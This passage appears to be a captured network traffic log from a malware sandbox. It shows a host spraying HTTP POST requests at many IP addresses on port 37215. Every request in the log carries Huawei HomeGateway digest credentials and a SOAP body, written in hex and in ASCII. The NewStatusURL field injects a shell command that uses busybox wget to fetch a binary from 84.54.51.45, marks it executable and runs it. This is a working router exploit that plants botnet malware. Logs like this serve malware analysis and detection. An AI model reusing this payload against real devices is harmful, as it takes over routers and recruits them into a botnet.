                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            336192.168.2.1547228197.175.107.15937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780965090 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            337192.168.2.1533912197.167.245.9237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.780997992 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            338192.168.2.1554830197.102.161.14837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781043053 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            339192.168.2.1546228197.210.174.13537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781095982 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            340192.168.2.1558242197.207.71.1037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781117916 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            341192.168.2.1559992197.110.29.20237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781121016 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            342192.168.2.1554392197.9.134.23037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781196117 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            343192.168.2.1545326197.187.62.6437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781196117 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            344192.168.2.1541132197.97.97.15637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781196117 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            345192.168.2.1533172197.170.222.13237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:07.781228065 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
